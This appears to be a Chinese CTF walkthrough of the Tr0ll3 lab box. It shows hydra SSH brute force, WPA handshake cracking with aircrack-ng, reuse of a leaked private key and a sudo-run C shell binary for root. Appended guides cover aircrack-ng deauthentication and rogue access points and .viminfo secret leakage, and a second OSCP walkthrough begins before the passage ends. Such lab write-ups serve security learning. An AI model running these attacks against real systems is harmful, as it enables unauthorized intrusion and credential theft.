扫描端口发现只有一个22端口打开，其他都关闭。一开始以为是靶机没开起来，回到虚拟机开机界面发现初始页面直接显示了登录用户名和密码，可以直接登录。也可以用hydra进行爆破，因为一开始Nmap扫描出来提示的SSH版本比较低。

1hydra -L top-usernames-shortlist.txt -P password.txt ssh://172.168.169.142

内网信息收集

内核信息收集

 1uname -a
 2lsb_release -a
 3---
 4start@Tr0ll3:~$ lsb_release -a
 5No LSB modules are available.
 6Distributor ID: Ubuntu
 7Description: Ubuntu 18.04.2 LTS
 8Release: 18.04
 9Codename: bionic
10start@Tr0ll3:~$ uname -a
11Linux Tr0ll3 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

用不了sudo

1start@Tr0ll3:~$ sudo -l
2[sudo] password for start:
3Sorry, user start may not run sudo on Tr0ll3.

找到文件夹下两个文件里给的提示

1start@Tr0ll3:~/bluepill$ cat awesome_work
2http://bfy.tw/ODa
3start@Tr0ll3:~/bluepill$ cat ../redpill/this_will_surely_work
4step2:Password1!

在home文件夹下找到其他用户，尝试进入step2用户文件夹，没有权限，密码也不是step2:Password1!。这个网址也是打不开的。

 1start@Tr0ll3:/home$ ls -al
 2total 40
 3drwxr-xr-x 10 root root 4096 Jun 19 2015 .
 4drwxr-xr-x 27 root root 4096 Aug 1 2019 ..
 5drwx------ 2 genphlux genphlux 4096 Jun 18 2015 appserver
 6drwx------ 4 eagle russ 4096 Aug 2 2019 eagle
 7drwx------ 2 fido fido 4096 Jun 18 2015 fido
 8drwx------ 4 genphlux genphlux 4096 Aug 2 2019 genphlux
 9drwx------ 5 maleus maleus 4096 Aug 2 2019 maleus
10drwx------ 7 start start 4096 Aug 2 2019 start
11drwx------ 2 step2 step2 4096 Jun 18 2015 step2
12drwx------ 4 wytshadow wytshadow 4096 Aug 2 2019 wytshadow
13start@Tr0ll3:/home$ cd step2
14-bash: cd: step2: Permission denied
15start@Tr0ll3:/home$ su step2
16Password:
17su: Authentication failure

查看/etc/passwd文件，没有发现可以爆破的hash。

 1start@Tr0ll3:/home$ cat /etc/passwd
 2root:x:0:0:root:/root:/bin/bash
 3daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 4bin:x:2:2:bin:/bin:/usr/sbin/nologin
 5sys:x:3:3:sys:/dev:/usr/sbin/nologin
 6sync:x:4:65534:sync:/bin:/bin/sync
 7games:x:5:60:games:/usr/games:/usr/sbin/nologin
 8man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
 9lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
10mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
11news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
12uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
13proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
14www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
15backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
16list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
17irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
18gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
19nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
20syslog:x:101:104::/home/syslog:/bin/false
21messagebus:x:102:106::/var/run/dbus:/bin/false
22landscape:x:103:109::/var/lib/landscape:/bin/false
23sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
24maleus:x:1000:1000:maleus,,,:/home/maleus:/bin/bash
25start:x:1001:1001:,,,:/home/start:/bin/bash
26ftp:x:105:112:ftp daemon,,,:/srv/ftp:/bin/false
27wytshadow:x:1003:1003:,,,:/home/wytshadow:/bin/bash
28genphlux:x:1004:1004:,,,:/home/genphlux:/bin/bash
29statd:x:106:65534::/var/lib/nfs:/bin/false
30fido:x:1005:1006:,,,:/home/fido:/bin/bash
31step2:x:1006:1007:,,,:/home/step2:/bin/bash
32eagle:x:1002:1002:,,,:/home/eagle:/bin/bash
33systemd-timesync:x:107:115:systemd Time Synchronization,,,:/run/systemd:/bin/false
34systemd-network:x:108:116:systemd Network Management,,,:/run/systemd/netif:/bin/false
35systemd-resolve:x:109:117:systemd Resolver,,,:/run/systemd/resolve:/bin/false
36uuidd:x:100:101::/run/uuidd:/bin/false
37_apt:x:111:65534::/nonexistent:/bin/false

上小豌豆一把梭，发现pkexec可以提权，但是因为没有sudo所以也用不了；可用命令中有gcc，所以下一步尝试一下能不能用内核提权漏洞直接gcc编译一下提权，但是靶机的Ubuntu版本太高了，可能提权不了。

 1 wget http://172.168.169.141:8000/linpeas.sh
 2 chmod +x linpeas.sh
 3 ---
 4
 5Linux version 4.15.0-55-generic (buildd@lcy01-amd64-029) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019
 6Distributor ID: Ubuntu
 7Description: Ubuntu 18.04.2 LTS
 8Release: 18.04
 9Codename: bionic
10
11╔══════════╣ Sudo version
12╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version
13Sudo version 1.8.21p2
14
15══╣ Polkit Binary
16Pkexec binary found at: /usr/bin/pkexec
17Pkexec binary has SUID bit set!
18-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
19pkexec version 0.105
20
21╔══════════╣ Useful software
22/usr/bin/base64
23/usr/bin/gcc
24/usr/bin/gdb
25/bin/nc
26/bin/netcat
27/usr/bin/perl
28/bin/ping
29/usr/bin/python
30/usr/bin/python2
31/usr/bin/python2.7
32/usr/bin/python3
33/usr/bin/python3.6
34/usr/bin/sudo
35/usr/bin/wget

翻一下主目录，发现两个不同于一般主目录的文件，lol和hints

lol目录提示需要权限。然后翻找/.hints目录发现，下面有很多套娃的文件夹，直到翻到最后一个发现一个txt文件，打开似乎是密码或者加密的密钥。

1ls /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/
2cat /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt

文件路径的英文翻译过来是一句嘲讽，不得不说Tr0ll系列的作者Maleus真的很欠扁，而且也不只我一个人这么觉得。

回到靶机，查看这个文件的权限发现是0777的，所以我们再广泛的搜索一下还有这样类似的文件。

1find / -type f -perm 0777 2>/dev/null 
2---
3start@Tr0ll3:/tmp$ find / -type f -perm 0777 2>/dev/null
4/var/log/.dist-manage/wytshadow.cap
5/.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt

流量包密码破解

cap明显是一个流量包文件，下载这两个文件到kali中再分析。

1scp start@172.168.169.142:/.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt gold_star.txt
2scp start@172.168.169.142:/var/log/.dist-manage/wytshadow.cap wytshadow.cap

查看流量包文件，发现开头就是一个叫wytshadow的用户登录的会话，用的是TpLink，这个很明显是WIFI无线网，使用无线网工具尝试爆破。

用默认的自带的字典爆破不成功，这是想到刚刚从那个欠扁的目录下载的gold_star.txt 是不是就是密码字典。

1tshark -r wytshadow.cap
2sudo apt install aircrack-ng
3aircrack-ng -w /usr/share/wordlists/fasttrack.txt wytshadow.cap
4aircrack-ng -w gold_star.txt wytshadow.cap

大概要爆破半小时。

开启Nginx服务

破解得到用户密码wytshadow:gaUoCe34t1

 1start@Tr0ll3:~$ su wytshadow
 2Password:
 3wytshadow@Tr0ll3:/home/start$ cd
 4wytshadow@Tr0ll3:~$ ls
 5oohfun
 6wytshadow@Tr0ll3:~$ ls -al
 7total 40
 8drwx------ 4 wytshadow wytshadow 4096 Aug 2 2019 .
 9drwxr-xr-x 10 root root 4096 Jun 19 2015 ..
10-rw-r--r-- 1 wytshadow wytshadow 220 Jun 17 2015 .bash_logout
11-rw-r--r-- 1 wytshadow wytshadow 3637 Jun 17 2015 .bashrc
12drwx------ 2 wytshadow wytshadow 4096 Jun 17 2015 .cache
13drwx------ 3 wytshadow wytshadow 4096 Aug 1 2019 .gnupg
14-rwsrwxrwx 1 genphlux root 8566 Jun 17 2015 oohfun
15-rw-r--r-- 1 wytshadow wytshadow 675 Jun 17 2015 .profile

执行oohfun发现提示一堆信息，暂时关闭。看一下sudo -l发现可以执行nginx服务，之前扫描这个靶机发现只有22端口，所以开80端口的任务原来是wytshadow用户完成。

 1sudo /usr/sbin/service nginx start
 2netstat -tunlpa
 3---
 4wytshadow@Tr0ll3:/tmp$ netstat -tunlpa
 5(No info could be read for "-p": geteuid()=1003 but you should be root.)
 6Active Internet connections (servers and established)
 7Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
 8tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN -
 9tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
10tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
11tcp 0 36 172.168.169.142:22 172.168.169.141:56950 ESTABLISHED -
12tcp6 0 0 
138080 
14* LISTEN -
15tcp6 0 0 
1622 
17* LISTEN -
18udp 0 0 127.0.0.53:53 0.0.0.0:* -
19udp 0 0 0.0.0.0:68 0.0.0.0:* -

查看nginx相关配置，最终找到配置文件，发现服务开启再8080端口上，限制user agent为"Lynx"。

 1# 查看nginx相关配置
 2wytshadow@Tr0ll3:/tmp$ find / -name nginx > find.txt
 3wytshadow@Tr0ll3:/tmp$ cat find.txt
 4/var/lib/nginx
 5/var/log/nginx
 6/var/nginx
 7/etc/init.d/nginx
 8/etc/logrotate.d/nginx
 9/etc/default/nginx
10/etc/nginx
11/etc/ufw/applications.d/nginx
12/usr/sbin/nginx
13/usr/lib/nginx
14/usr/share/nginx
15/usr/share/doc/nginx
16wytshadow@Tr0ll3:/tmp$ cat /etc/nginx/sites-available/default
17##
18# You should look at the following URL's in order to grasp a solid understanding
19# of Nginx configuration files in order to fully unleash the power of Nginx.
20# https://www.nginx.com/resources/wiki/start/
21# https://www.nginx.com/resources/wiki/start/topics/tutorials/config_pitfalls/
22# https://wiki.debian.org/Nginx/DirectoryStructure
23#
24# In most cases, administrators will remove this file from sites-enabled/ and
25# leave it as reference inside of sites-available where it will continue to be
26# updated by the nginx packaging team.
27#
28# This file will automatically load configuration files provided by other
29# applications, such as Drupal or Wordpress. These applications will be made
30# available underneath a path with that package name, such as /drupal8.
31#
32# Please see /usr/share/doc/nginx-doc/examples/ for more detailed examples.
33##
34
35# Default server configuration
36#
37server {
38 listen 8080 default_server;
39 listen [::]:8080 default_server;
40 if ($http_user_agent !~ "Lynx*"){
41 return 403;
42}
43 # SSL configuration
44 #
45 # listen 443 ssl default_server;
46 # listen [::]:443 ssl default_server;
47 #
48 # Note: You should disable gzip for SSL traffic.
49 # See: https://bugs.debian.org/773332
50 #
51 # Read up on ssl_ciphers to ensure a secure configuration.
52 # See: https://bugs.debian.org/765782
53 #
54 # Self signed certs generated by the ssl-cert package
55 # Don't use them in a production server!
56 #
57 # include snippets/snakeoil.conf;
58
59 root /var/nginx/www;
60
61 # Add index.php to the list if you are using PHP
62 index index.html index.htm index.nginx-debian.html;
63
64 server_name _;
65
66 location / {
67 # First attempt to serve request as file, then
68 # as directory, then fall back to displaying a 404.
69 try_files $uri $uri/ =404;
70 }

Kali再次扫描确认8080端口确实打开了。

带Agent参数访问得到一个新的用户名和密码genphlux:HF9nd0cR!。

1curl -A "Lynx" http://172.168.169.142:8080

SSH密钥获取

登录genphlux用户发现可以开启apache服务，但是开了好像也访问不了。

回到原来的位置sudo -l一下

 1wytshadow@Tr0ll3:/tmp$ su genphlux
 2Password:
 3genphlux@Tr0ll3:/tmp$ id
 4uid=1004(genphlux) gid=1004(genphlux) groups=1004(genphlux)
 5genphlux@Tr0ll3:/tmp$ sudo -l
 6[sudo] password for genphlux:
 7Matching Defaults entries for genphlux on Tr0ll3:
 8 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 9
10User genphlux may run the following commands on Tr0ll3:
11 (root) /usr/sbin/service apache2 start
12genphlux@Tr0ll3:/tmp$sudo /usr/sbin/service apache2 start

在用户目录下发现存在maleus用户的密钥。将密钥文字复制到Kali上即可用密钥登录新用户。

 1genphlux@Tr0ll3:~$ ll
 2total 44
 3drwx------ 4 genphlux genphlux 4096 Aug 2 2019 ./
 4drwxr-xr-x 10 root root 4096 Jun 19 2015 ../
 5-rw-r--r-- 1 genphlux genphlux 220 Jun 17 2015 .bash_logout
 6-rw-r--r-- 1 genphlux genphlux 3637 Jun 17 2015 .bashrc
 7drwx------ 2 genphlux genphlux 4096 Jun 17 2015 .cache/
 8drwx------ 3 genphlux genphlux 4096 Aug 1 2019 .gnupg/
 9-rw-rw-r-- 1 genphlux genphlux 1675 Jun 18 2015 maleus
10-rw-r--r-- 1 genphlux genphlux 675 Jun 17 2015 .profile
11-rw------- 1 genphlux genphlux 5649 Jun 17 2015 .viminfo
12-rw-rw-r-- 1 genphlux genphlux 931 Aug 2 2019 xlogin
13genphlux@Tr0ll3:~$ cat maleus
14-----BEGIN RSA PRIVATE KEY-----
15MIIEowIBAAKCAQEAwz5Hwer48U1t/Qi9JveuO+Z7WQlnmhOOs/2pZ0he/OyVsEFv
16DsGib1wu/N8t+7h9JZK9x2GL33TXQBVCy6TxES90F1An+2DSza6lJPCyhcgK/DEp
17yxSVt32A+lFo+PQJV6QYZlpRkek0MjUw5y/E5qZwdBypC55C4QzgQBN3+Lnuhuk4
18u52xcK9/6/2N7JZCNYA21Tp1Uy9mty/65IT7OwKJd2rXp3O6rZYTD/vPl+Rt/LtN
19gA1DbDODq0NCmvcrZL+SafSj+MABA3LCERw01gA4RMdyxJU6hVfjeSKOdwDQOGWe
20eAVCL2GR/frwyf+rfN1kbpdw/RGXWWwVANMcaQIDAQABAoIBAGNudFztrZo2NK2I
21pcwSl0kqN+dAQuLU0vgXVw6ibL2iPxlkOYrqUi8kY0mk32YyrolUEhJYO0Ox3W1l
22Zn8PoTV/VUAKMlJzHOhi6PfHHSPEnNOSthYWhajM4cKZczxWC+v2RfbaSHBms45e
23SGl0inJskRiRAAZKswSp6gq334FrS6Dwy1tiKvzCfR3kLQghV5U/PhFZCsq3xvAw
24eXPx2toNtU2gYSGrKWTep+nAKM1neBxeZAujYuN4xJ5/Th2y0pyTvX9WEgzKPJ/G
25PlYZYCUAKPCbabYSuZckjeiN1aS52AIFedECBfAIezOr08Wx/bI/xCOgBxrQgPrK
26kRvlOYECgYEA5eCIEfdLhWdg3ltadYE0O5VAoXKrbxYWqSyw1Eyeqj0N1qD9Rsvg
27jIQJazV5JcVBIF54f/jlCJozR5s5AELrY0Z/krea1lF5ecOSUQE3tp94298xzO3g
287BBe3g6pD56Cya/Vo0+YVQmAnBHLh6QIYvUUXXN2IyceT8fhEx5JA+sCgYEA2W4z
29KKMVAdPxKcjVks1zdGmVlj1RsUkakYuLWV3jQe2w1naJrc37Khy5eWZaRJhXqeBb
301cvTMa+r/BF7jvItxglWoBJqXDxKI0a6KqWtloZL2ynoaBkAhR2btob6nSN63Bpg
31ZYJKY1B5yYbDHK4k6QT7atn2g6DAv/7sW6skj/sCgYA16WTAIek6TjZvr6kVacng
32N27C7mu6T8ncvzhxcc68SjlWnscHtYTiL40t8YqKCyrs9nr4OF0umUtxfbvujcM6
33syv0Ms9DeDQvFGjaSpjQYbIsjrnVP+zCMEyvc2y+1wQBXRWTiXVGbEYXVC0RkKzO
342H+AMzX/pIr9Vvk4TJ//JQKBgFNJcy9NyO46UVbAJ49kQ6WEDFjQhEp0xkiaO3aw
35EC1g7yw3m+WH0X4AIsvt+QXtlSbtWkA7I1sU/7w+tiW7fu0tBpGqfDN4pK1+mjFb
365XKTXttE4lF9wkU7Yjo42ib3QEivkd1QW05PtVcM2BBUZK8dyXDUrSkemrbw33j9
37xbOhAoGBAL8uHuAs68ki/BWcmWUUer7Y+77YI/FFm3EvP270K5yn0WUjDJXwHpuz
38Fg3n294GdjBtQmvyf2Wxin4rxl+1aWuj7/kS1/Fa35n8qCN+lkBzfNVA7f626KRA
39wS3CudSkma8StmvgGKIU5YcO8f13/3QB6PPBgNoKnF5BlFFQJqhK
40-----END RSA PRIVATE KEY-----
41# 上面密钥复制到Kali中
42┌──(kali㉿kali)-[~/Desktop/Tr0ll3]
43└─$ ssh maleus@172.168.169.142 -i maleus

VIM信息发现

有个可执行文件，查看发现密码，但是执行这个文件，sudo输入这个密码都提示不对。发现用户文件夹下还有一个viminfo文件。发现密码 B^slc8I$就是maleus用户的密码。

sudo -l发现当前用户可以以root身份执行刚刚那个脚本，而且脚本也是对当前用户有写权限，所以把脚本写到这个文件里执行即可获得权限。

C脚本提权

1int main()
2{
3 system("/bin/bash");
4}

因为dont_even_bother是个编译后的脚本，而从最开始的信息收集中发现，gcc命令是可以执行的，所以写一个最简单的C脚本即可提权。

1gcc test.c -o dont_even_bother
2sudo ./dont_even_bother

Pr00fThatTh3L33tHax0rG0tTheFl@g!!

其他信息

在www文件夹下发现用户名和密码 fido:x4tPl!，但是su切换不过去，或许有别的方法可以进，下次试试。

Apache服务80端口开了，但是不知道如何访问，无论是Kali还是靶机内部的root用户访问都提示403

补充知识点

Aircrack-ng：无线网络安全审计终极工具

Aircrack-ng 是一款开源的 WiFi 网络安全工具套件，主要用于：

📶 无线网络渗透测试
🔓 WEP/WPA/WPA2-PSK 密钥破解
🔍 无线网络流量分析
📡 无线接入点审计

核心功能组件

工具	功能描述	典型用途
airmon-ng	启用无线网卡监控模式	准备网卡进行抓包
airodump-ng	捕获并分析 WiFi 流量（握手包、信标帧等）	扫描网络并保存抓包文件
aireplay-ng	生成自定义无线流量（欺骗、重放攻击）	强制设备重连获取WPA握手包
aircrack-ng	使用字典攻击/暴力破解破解 WEP/WPA/WPA2 密钥	实际密码破解
airdecap-ng	用破解的密钥解密捕获的流量	分析网络中的明文通信

主要应用场景

1. WEP加密破解

1# 捕获足够IVs数据包后直接破解
2aircrack-ng -b 00:11:22:33:44:55 capture.cap

2. WPA/WPA2握手包捕获与破解

1# 捕获握手包
2airodump-ng -c 6 --bssid AP_MAC -w capture wlan0mon
3
4# 使用字典破解
5aircrack-ng -w password.lst -b AP_MAC capture.cap

3. 创建虚拟接入点

1# 模拟合法AP进行中间人攻击
2airbase-ng -e "Free_WiFi" -c 6 wlan0mon

4. 无线网络诊断

1# 检测隐藏SSID网络
2airodump-ng wlan0mon --hidden

经典破解流程（WPA/WPA2）

启用监控模式：airmon-ng start wlan0
扫描网络：airodump-ng wlan0mon

捕获握手包：

1airodump-ng -c [频道] --bssid [AP_MAC] -w capture wlan0mon

强制握手（可选）：

1aireplay-ng -0 4 -a [AP_MAC] -c [客户端MAC] wlan0mon

破解密码：

1aircrack-ng -w rockyou.txt capture-01.cap

重要技术参数

参数	作用示例	破解成功率因素
字典质量	`-w rockyou.txt`	70%+ 常见密码可在前100万条命中
GPU加速	`--gpu-temp-disable`	NVIDIA/AMD显卡可提速100倍
规则攻击	`-r rules.txt`	通过变形规则扩展字典
会话恢复	`-l session.txt`	中断后可恢复破解进度
多文件处理	`files/*.cap`	可批量处理多个抓包文件

替代工具推荐

Hashcat：支持GPU加速的密码破解（兼容aircrack捕获文件）
Wifite：自动化无线审计工具（基于aircrack-ng）
Fern Wifi Cracker：图形化无线审计工具
Kismet：无线网络探测与IDS系统

`.viminfo` 文件详解

.viminfo 是 Vim 文本编辑器自动生成的用户状态记录文件，通常位于用户主目录（~/.viminfo）。它在 Vim 启动时读取，关闭时更新，用于保存用户编辑会话之间的状态信息。

主要作用

功能	具体说明
命令历史	保存 `:` 命令行模式输入的所有命令
搜索历史	记录 `/` 和 `?` 搜索模式的所有关键字
跳转位置	保存用户在各文件中的光标位置 (`'` 和 ``` 标记)
寄存器内容	存储复制/删除操作的临时数据 (包括未命名寄存器 `"`)
缓冲区列表	记录最近编辑过的文件路径
输入行历史	保存命令行模式下输入的长命令片段

敏感信息泄露风险

该文件可能暴露以下敏感信息：

1. 文件路径与内容

# 示例 .viminfo 片段
|4,1,48,2,1,0,1646305385,"~/Documents/secret_passwords.txt"
|4,0,34,1,0,0,1646305427,":w !sudo tee %" # 暴露sudo操作

泄露路径：个人文档、机密项目、密码文件的完整路径
命令风险：sudo操作、文件解密/加密命令

2. 凭证与密钥片段

|4,7,1,0,1,0,1646305302,"/API_KEY=\"sk_live_"
|4,3,1,0,1,0,1646305351,"/password = \"Admin@2023"

API密钥、密码等敏感文本碎片
数据库连接字符串、SSH私钥片段

3. 操作系统敏感数据

|4,0,32,1,0,0,1646305487,":!cat /etc/passwd" # 系统文件操作
|4,1,41,2,1,0,1646305521,"~/.ssh/id_rsa" # 密钥文件路径

系统命令操作记录 (! 开头的命令)
SSH密钥、配置文件路径

4. 隐私行为痕迹

|4,4,1,0,1,0,1646305555,"/salary.xlsx" # 财务文件
|4,1,38,2,1,0,1646305589,":e ~/medical_records.txt" # 医疗记录

隐私文档访问痕迹
敏感搜索历史（如个人信息、证件号等）

安全防护措施

1. 禁用 .viminfo（推荐）

在 ~/.vimrc 中添加：

set viminfo=
set viminfo+=n$HOME/.vim/viminfo " 自定义加密路径

2. 按需排除敏感信息

1" 不保存寄存器内容
2set viminfo='0
3
4" 禁用搜索/命令历史
5set viminfo=/0,:0
6
7" 跳过特定寄存器 (e.g. 复制寄存器"0)
8set viminfo-=r0

3. 文件权限加固

1chmod 600 ~/.viminfo # 仅用户可读写
2sudo chattr +i ~/.viminfo # 禁止修改 (Immutable flag)

4. 自动清理脚本

创建定期清理任务 (cron):

1# 每日清空 .viminfo
20 3 * * * echo "" > ~/.viminfo

5. 替代安全工具

工具	安全特性
Neovim	支持 `shada` 加密 (`:h 'shada'`)
Vim.gui	可完全禁用历史 (`:set viminfo=NONE`)
Emacs	历史文件独立加密 (`~/.emacs.desktop.lock`)

取证分析示例

攻击者获取 .viminfo 后可能提取信息：

grep -E '"(/|!|:)' ~/.viminfo # 提取命令和搜索
grep '"[a-zA-Z0-9_]{20,}' ~/.viminfo # 查找长字符串 (可能密钥)

📌 关键建议：在共享系统或处理敏感数据时，始终在 vimrc 中配置 set viminfo= ，或使用 vim -i NONE 临时禁用该功能。

用Python模仿curl的方法

这个靶机中存在无法使用curl的情况，可以使用python来模仿curl的功能。在 Python 3 的交互式环境（如 python shell 或 ipython）中模拟 curl 的功能，可以使用 requests 或 urllib 库。以下是完整指南：

🐍 使用 `requests` 库

 1# 安装 requests（如果未安装）
 2>>> import sys, subprocess
 3>>> if 'requests' not in sys.modules:
 4... subprocess.check_call([sys.executable, "-m", "pip", "install", "requests"])
 5... import requests
 6... else:
 7... import requests
 8
 9# 1. 发起 GET 请求（类似 curl http://example.com）
10>>> response = requests.get('https://httpbin.org/get')
11>>> response.status_code
12200
13>>> response.text # 获取响应内容
14
15# 2. 发起 POST 请求（类似 curl -X POST -d "key=value"）
16>>> payload = {'username': 'admin', 'password': 'secret'}
17>>> response = requests.post('https://httpbin.org/post', data=payload)
18>>> response.json() # 解析 JSON 响应
19
20# 3. 自定义 Headers（类似 curl -H "Content-Type: application/json"）
21>>> headers = {'User-Agent': 'PyCurl/1.0', 'X-Custom': 'value'}
22>>> response = requests.get('https://httpbin.org/headers', headers=headers)
23
24# 4. 处理 Cookies（类似 curl --cookie "name=value"）
25>>> response = requests.get('https://httpbin.org/cookies', cookies={'session': 'abc123'})
26
27# 5. 文件上传（类似 curl -F "file=@test.txt"）
28>>> files = {'file': ('filename.txt', open('test.txt', 'rb'))}
29>>> response = requests.post('https://httpbin.org/post', files=files)
30
31# 6. 处理重定向（默认自动重定向，禁用类似 curl -L）
32>>> response = requests.get('https://httpbin.org/redirect/1', allow_redirects=False)
33
34# 7. 超时设置（类似 curl --max-time 5）
35>>> try:
36... response = requests.get('https://httpbin.org/delay/10', timeout=3)
37... except requests.exceptions.Timeout:
38... print("Request timed out!")

📊 功能对照表

curl 命令示例	Python requests 等效代码
`curl http://example.com`	`requests.get('http://example.com')`
`curl -X POST -d "key=value"`	`requests.post(url, data={'key':'value'})`
`curl -H "Authorization: Bearer token"`	`requests.get(url, headers={'Authorization':'Bearer token'})`
`curl --cookie "session=abc"`	`requests.get(url, cookies={'session':'abc'})`
`curl -L --location-trusted`	`requests.get(url, allow_redirects=True)`
`curl --data-binary @file.txt`	`requests.post(url, data=open('file.txt','rb'))`
`curl -u user:pass`	`requests.get(url, auth=('user','pass'))`

🌐 使用标准库 `urllib`（无需安装）

 1>>> from urllib import request, parse
 2
 3# GET 请求
 4>>> with request.urlopen('https://httpbin.org/get') as res:
 5... print(res.read().decode('utf-8'))
 6
 7# POST 请求
 8>>> data = parse.urlencode({'key': 'value'}).encode()
 9>>> req = request.Request('https://httpbin.org/post', data=data)
10>>> with request.urlopen(req) as res:
11... print(res.read().decode('utf-8'))
12
13# 添加 Headers
14>>> req = request.Request('https://httpbin.org/headers')
15>>> req.add_header('User-Agent', 'Python-URLLib/3.0')
16>>> request.urlopen(req)

⚙️ 高级技巧

1. 保持会话状态（模拟多个连续请求）

1>>> session = requests.Session()
2>>> session.get('https://httpbin.org/cookies/set/session/abc123') # 设置 cookie
3>>> response = session.get('https://httpbin.org/cookies') # 携带 cookie

2. 处理 SSL/TLS 证书验证

1# 忽略证书错误（类似 curl -k）
2>>> requests.get('https://expired.badssl.com', verify=False)
3
4# 使用自定义 CA 证书
5>>> requests.get('https://internal.site', verify='/path/to/ca.pem')

3. 调试请求详情（类似 curl -v）

1>>> import logging
2>>> logging.basicConfig(level=logging.DEBUG) # 启用调试输出
3>>> requests.get('https://httpbin.org/get')

4. 进度条显示（大文件下载）

1>>> from tqdm import tqdm
2>>> url = "https://example.com/bigfile.zip"
3>>> response = requests.get(url, stream=True)
4>>> with open("bigfile.zip", "wb") as f, tqdm(total=int(response.headers.get('content-length',0)), unit='B') as pbar:
5... for chunk in response.iter_content(chunk_size=1024):
6... f.write(chunk)
7... pbar.update(len(chunk))

💡 在 IPython 中的交互技巧

在 IPython 环境中 (pip install ipython)，可以使用 ! 直接运行系统命令：

1!curl https://httpbin.org/get

或者捕获输出：

1curl_output = !curl -s https://httpbin.org/get
2print(curl_output)

对于 Python 函数，使用 %time 计时：

1%time requests.get('https://google.com')

注意事项

在生产环境中避免 verify=False，会降低安全性
处理大文件下载时使用 stream=True 避免内存耗尽
对于复杂站点（JS渲染），考虑使用 selenium 替代
HTTP/2 支持需安装 httpx 库（pip install httpx）

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

OSCP官方靶场-Amaterasu WP

Thu, 17 Jul 2025 17:23:45 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官方网页打开靶机，此靶机目前暂未在https://www.vulnhub.com/ 有镜像文件，后续若官方给出，会在评论补充。连上VPN后测速自动设置MTU【踩坑总结】丝滑连接OffSec官方VPN的方法。

信息收集

1# 靶机地址
2192.168.222.249
3# Kali攻击机地址
4192.168.45.156
5# 题目提示的用户凭证
6alfredo
7DriveMailLens774

扫描端口

1ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.222.249 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
2echo $ports
3sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.222.249
4sudo nmap --script=vuln -p$ports -Pn 192.168.222.249

扫描结果如下：

 1┌──(kali㉿kali)-[~/Desktop/Amaterasu]
 2└─$ echo $ports
 321,22,111,139,443,445,2049,10000,25022,33414,40080
 4
 5┌──(kali㉿kali)-[~/Desktop/Amaterasu]
 6└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.222.249
 7Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 22:16 EDT
 8Nmap scan report for bogon (192.168.222.249)
 9Host is up (0.21s latency).
10
11PORT STATE SERVICE
1221/tcp open ftp
1322/tcp closed ssh
14111/tcp closed rpcbind
15139/tcp closed netbios-ssn
16443/tcp closed https
17445/tcp closed microsoft-ds
182049/tcp closed nfs
1910000/tcp closed snet-sensor-mgmt
2025022/tcp open unknown
2133414/tcp open unknown
2240080/tcp open unknown
23
24Nmap done: 1 IP address (1 host up) scanned in 32.13 seconds
25
26┌──(kali㉿kali)-[~/Desktop/Amaterasu]
27└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.222.249
28Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 22:13 EDT
29Nmap scan report for bogon (192.168.222.249)
30Host is up (0.11s latency).
31
32PORT STATE SERVICE VERSION
3321/tcp open ftp vsftpd 3.0.3
34| ftp-syst: 
35| STAT: 
36| FTP server status:
37| Connected to 192.168.45.156
38| Logged in as ftp
39| TYPE: ASCII
40| No session bandwidth limit
